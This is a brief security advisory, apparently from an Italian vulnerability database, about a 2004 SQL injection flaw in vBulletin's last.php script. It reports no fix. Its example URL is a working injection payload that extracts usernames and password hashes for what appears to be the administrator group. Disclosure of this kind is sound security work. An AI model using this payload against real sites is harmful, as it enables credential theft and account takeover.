vBulletin LAST.PHP SQL Injection Vulnerability

2004-11-15 00:00:00

Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.